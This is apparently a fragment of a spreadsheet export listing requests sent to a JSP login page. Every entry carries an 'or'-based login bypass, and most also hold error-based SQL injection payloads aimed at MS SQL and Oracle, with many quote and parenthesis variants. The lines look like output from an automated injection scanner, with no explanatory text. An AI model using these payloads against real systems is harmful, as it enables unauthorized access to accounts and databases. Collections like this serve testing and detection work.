    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8859&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2521")or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("wymj"="wymj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3580&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5366"))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("mohc"="mohc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2595&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2352")))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("suhb"="suhb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1455&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3842"or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"dgiv"="dgiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6489")or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("vemi"like"vemi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4358"))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("mnjk"like"mnjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6286&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6326")))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("lxvn"like"lxvn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2401&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1918"or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"cpdf"like"cpdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3384&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9105)or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5339&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1866')or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8631&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4958'or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2025&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9360"or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1991&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3996)or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(6732=6732&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-36&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9896))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((3529=3529&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4709&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5624)))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((8957=8957&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-369&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5916or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2234&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3542')or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('xued'='xued&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8084&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7949'))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('gjmz'='gjmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7840&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6771')))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('tgep'='tgep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-636&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-415'or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'rinl'='rinl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8280')or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('dbyn'like'dbyn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2329&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5062'))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('puzn'like'puzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1243&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3112')))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('vrol'like'vrol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5628&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7228'or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'uuur'like'uuur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7822&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4423")or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("cfxi"="cfxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1889&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1517"))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("pruk"="pruk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9369&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8094")))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("syqw"="syqw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-450&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7112"or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"lqwb"="lqwb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3750&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9121")or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("ozfp"like"ozfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6043&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1743"))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("xhat"like"xhat&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3734&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1215")))or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("jygk"like"jygk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7258&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3347"or2209in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2209=2209)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"rjxh"like"rjxh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9674&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8364)or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2252&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1042')or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8474&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4729'or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6183&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1020"or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4397&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6429)or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(7003=7003&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8287&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7616))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((8327=8327&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9943&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3753)))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(((145=145&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1841&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8609or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8634&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1183')or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('qewm'='qewm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-835&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-405'))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('xioe'='xioe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-115&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8320')))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('dyvf'='dyvf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1093&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8657'or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'agzm'='agzm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9629&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8234')or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('plwg'like'plwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6908&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5464'))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('okdk'like'okdk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6004')))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('avpf'like'avpf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2648&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-172'or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'dpeo'like'dpeo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2304&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2586")or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("nihh"="nihh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2496&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1916"))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("sfwl"="sfwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5615&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5143")))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("phnu"="phnu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4928&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8829"or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"cadt"="cadt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9319&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3840")or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("mvpy"like"mvpy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9764&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2541"))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("horx"like"horx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1008&amp;modo=entrar</t>
  </si>
  <si>
